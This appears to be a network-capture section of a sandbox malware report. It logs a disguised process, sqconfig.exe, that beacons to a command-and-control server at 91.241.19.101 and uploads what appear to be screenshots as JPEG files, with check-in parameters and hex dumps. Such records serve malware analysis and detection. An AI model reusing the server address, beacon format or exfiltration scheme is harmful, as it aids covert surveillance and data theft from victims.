                                                                  Sep 30, 2021 23:53:53.481801987 CEST18998OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:53.481879950 CEST19000OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:53.600650072 CEST19014OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:53.600883961 CEST19017OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:53.600929976 CEST19024OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:53:53.601052046 CEST19026OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:53:53.720583916 CEST19032OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:53.720733881 CEST19035OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:53:53.720819950 CEST19053OUTData Raw: ad 1e ca 7d 85 ed a1 dc a1 4e e2 af 0d 38 fa d2 8d 38 fa d5 7b 19 76 13 ad 0e e5 0a 2a ff 00 f6 71 f5 a5 fe ce 3e a2 8f 65 2e c1 ed a3 dc a1 4e ab c3 4e 3e b4 e1 a7 1f 5a af 63 2e c4 fb 68 77 33 e9 2b 48 69 a7 d6 97 fb 30 fa d1 ec 66 2f 6f 0e e6
                                                                  Data Ascii: }N88{v*q>e.NN>Zc.hw3+Hi0f/on)kQ4GZOUK>>E<VH_U{)3E_WSdZMav'44e/:zT/b)*V_YG^Ujjs8x@
                                                                  Sep 30, 2021 23:53:53.927716017 CEST19075INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  183192.168.2.35001891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:53.799503088 CEST19075OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:53.993045092 CEST19076INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  184192.168.2.35001991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:54.246906042 CEST19077OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:54.459295034 CEST19116INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  185192.168.2.35002091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:54.275799036 CEST19077OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----d4316affd2e48a2f64fddcbb46f39e4c
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86733
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:54.276024103 CEST19077OUTData Raw: 2d 2d 2d 2d 2d 2d 64 34 33 31 36 61 66 66 64 32 65 34 38 61 32 66 36 34 66 64 64 63 62 62 34 36 66 33 39 65 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------d4316affd2e48a2f64fddcbb46f39e4cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:54.276309967 CEST19087OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:54.276510000 CEST19090OUTData Raw: a2 8a 28 00 a2 8a 28 01 79 a4 a2 8a 00 5a 4a 5a 4a 60 14 b4 94 b4 00 51 45 1c d0 02 d1 49 46 68 10 ea 29 05 2d 00 19 a5 14 86 8e d4 c4 3a 80 69 a0 d1 9a 60 3f 75 26 69 b9 ab 9a 65 97 f6 96 ad 67 63 e6 79 7f 69 9d 21 df 8c ed dc c0 67 1d fa d2 b8
                                                                  Data Ascii: ((yZJZJ`QEIFh)-:i`?u&iegcyi!gX{Vsm-E@.ynqW>"Q$q)Hn{xBF]>V~>lO}yy5#%';hgEvPh%E"Oo~|,Hn@iD#y_pI
                                                                  Sep 30, 2021 23:53:54.404174089 CEST19095OUTData Raw: 7e a1 b0 7e e8 ae 7d 35 9b 67 fb ca e9 f5 19 ac 49 a7 9a e6 66 9a e2 59 25 95 be f3 c8 c5 98 fd 49 a5 58 65 6b 79 27 58 a4 68 63 65 57 90 29 2a a5 b3 80 4f 40 4e 0e 3e 86 b7 84 e5 08 a5 d8 ca 49 4a 4d 96 e5 d5 6e bc e7 f2 e6 fd de e3 b7 e5 1d 3b
                                                                  Data Ascii: ~~}5gIfY%IXeky'XhceW)*O@N>IJMn;vj^ot73Pgj[qsEcX[CBW#{G}@9w%ir'R$c$=p3H@~*XF4)h0ZJ;PE--1J(vuX.
                                                                  Sep 30, 2021 23:53:54.404246092 CEST19098OUTData Raw: 51 54 49 3c e0 c0 28 50 e3 b1 cf 3b cf 7e d5 cd 89 a9 15 1e 57 b9 51 ad 18 4b de 3d 82 c3 52 f1 4b ea 36 a9 71 1d d0 81 a5 41 26 eb 50 06 dc 8c e4 ed e3 8a af fd a9 e2 ef f9 e7 77 ff 00 80 63 ff 00 89 af 38 ff 00 84 db 53 47 57 b5 82 c6 d5 94 e5
                                                                  Data Ascii: QTI<(P;~WQK=RK6qA&Pwc8SGWZ;pOl^g}m'\<|(}''+_V9##~A|\SZy\C;{6kjlo+&Gxk~PpgkQrrSOMMc
                                                                  Sep 30, 2021 23:53:54.404503107 CEST19106OUTData Raw: 2d 97 e2 7d 63 79 e1 5b eb 8b eb 89 d2 5b 70 b2 4a ce 01 66 ce 09 cf a5 79 bf c7 b8 5a de c7 c2 70 39 05 a3 8e 74 24 74 c8 10 8a f1 6a 2b 4a 78 6e 49 73 5c ae 78 a4 ec b7 12 96 92 96 ba 8c 85 a2 92 97 34 00 51 45 1d a9 80 1a 28 34 94 80 5e f4 1a
                                                                  Data Ascii: -}cy[[pJfyZp9t$tj+JxnIs\x4QE(4^(IKL@(;EQKE&Ip#)HP5"Tc=b*mIhcDB,C(4QKEP!1F)b\QQ@R)iJQKE;KJ(W9Z(@b
                                                                  Sep 30, 2021 23:53:54.404546976 CEST19110OUTData Raw: fd 2b 45 b8 f0 f5 cd dc 50 43 f2 a9 2a ea 3b d6 d1 cc 1b 6a 35 21 6b 92 f0 8e 29 ca 9d 44 ec 7c a5 de bd 2b e0 7a a3 f8 f2 55 75 56 53 63 26 43 0c 8f bc 95 e6 b5 d6 7c 3c f1 4d a7 83 fc 48 fa 9d e5 bc d3 c4 6d de 20 91 63 24 92 be a4 71 c1 af 3a
                                                                  Data Ascii: +EPC*;j5!k)D|+zUuVSc&C|<MHm c$q:n#l(Q{}Z({8Fp0H^^N@p84[k]Ph03q+|Gu?jM7RIG#sVEZ.GK[;;;I5b63;WEgk+8j
                                                                  Sep 30, 2021 23:53:54.404643059 CEST19115OUTData Raw: 76 28 a0 04 c5 2e 29 69 45 01 71 00 a7 01 45 2d 32 43 14 b8 a3 14 ed a4 f4 53 40 ae 20 14 e0 29 c2 17 3f c2 6a 41 6e fe df 9d 17 21 c9 0c d8 0f 60 68 f2 50 ff 00 0d 4e 20 3d d8 0a 78 89 07 57 34 b9 91 3c e5 43 6e bf 4a 3e cf e8 45 5f 55 84 1e 55
                                                                  Data Ascii: v(.)iEqE-2CS@ )?jAn!`hPN =xW4<CnJ>E_UULDOBfbUXv?_:}EJ.EsR*P>Vjk:ysD#7s^+*MF+/C0rr=7"jz=~L8]\S
                                                                  Sep 30, 2021 23:53:54.535837889 CEST19129OUTData Raw: 5a 41 4b 54 48 a2 9c 29 a2 96 98 98 e0 69 c0 d3 29 45 34 4b 1d 4f 1d 29 82 9f 54 89 60 69 69 05 2d 50 85 a7 0e 94 ca 70 e9 41 22 e6 9c 0d 33 34 a2 98 87 d2 8e d4 de d4 e1 56 89 1d de 96 9b 4a 29 a1 0b 45 1d e9 69 88 7a 53 e9 83 8a 52 6a d1 0c 76
                                                                  Data Ascii: ZAKTH)i)E4KO)T`ii-PpA"34VJ)EizSRjvS1MXsTHhR)=x4(!4ih\sP3M,g4ii SR)%<SiGJ)@.isLE8tfBSCKG^vs
                                                                  Sep 30, 2021 23:53:54.535948038 CEST19153OUTData Raw: d2 d2 52 d2 10 b4 51 4a 29 08 28 14 52 d2 10 53 85 14 b4 84 c2 94 51 4a 29 12 00 7b 52 e2 8a 70 19 61 8a 4c 45 ab 68 f1 5d 36 89 16 6e 50 fb d7 3f 6e 3a 57 51 a0 8f f4 94 fa d7 99 8c 97 b8 cf a0 cb 20 b9 d0 bf 11 53 fe 25 30 9f 46 af 29 b1 5c eb
                                                                  Data Ascii: RQJ)(RSQJ){RpaLEh]6nP?n:WQ S%0F)\z,?':x1q>+W:+Yspj0F8n)zQEuNN\E-"fi*Yhpf)f"ARbr*EJ)TSSrKIZ)F
                                                                  Sep 30, 2021 23:53:54.739955902 CEST19165INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  186192.168.2.35002191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:54.705373049 CEST19165OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:54.902427912 CEST19165INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:54 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  187192.168.2.35002291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:55.101316929 CEST19166OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:55.101583004 CEST19166OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:55.101970911 CEST19176OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:55.102268934 CEST19179OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:55.227783918 CEST19182OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:55.227859020 CEST19190OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:55.228087902 CEST19198OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:55.228379965 CEST19200OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:55.228504896 CEST19205OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:55.357301950 CEST19213OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:55.357687950 CEST19226OUTData Raw: ad 1e ca 7d 85 ed a1 dc a1 4e e2 af 0d 38 fa d2 8d 38 fa d5 7b 19 76 13 ad 0e e5 0a 2a ff 00 f6 71 f5 a5 fe ce 3e a2 8f 65 2e c1 ed a3 dc a1 4e ab c3 4e 3e b4 e1 a7 1f 5a af 63 2e c4 fb 68 77 33 e9 2b 48 69 a7 d6 97 fb 30 fa d1 ec 66 2f 6f 0e e6
                                                                  Data Ascii: }N88{v*q>e.NN>Zc.hw3+Hi0f/on)kQ4GZOUK>>E<VH_U{)3E_WSdZMav'44e/:zT/b)*V_YG^Ujjs8x@
                                                                  Sep 30, 2021 23:53:55.558290958 CEST19254INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  188192.168.2.35002391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:55.157685995 CEST19179OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:55.360728025 CEST19253INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  189192.168.2.35002491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:55.609260082 CEST19254OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:55.813376904 CEST19255INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  19192.168.2.34977891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:55.182862043 CEST7688OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
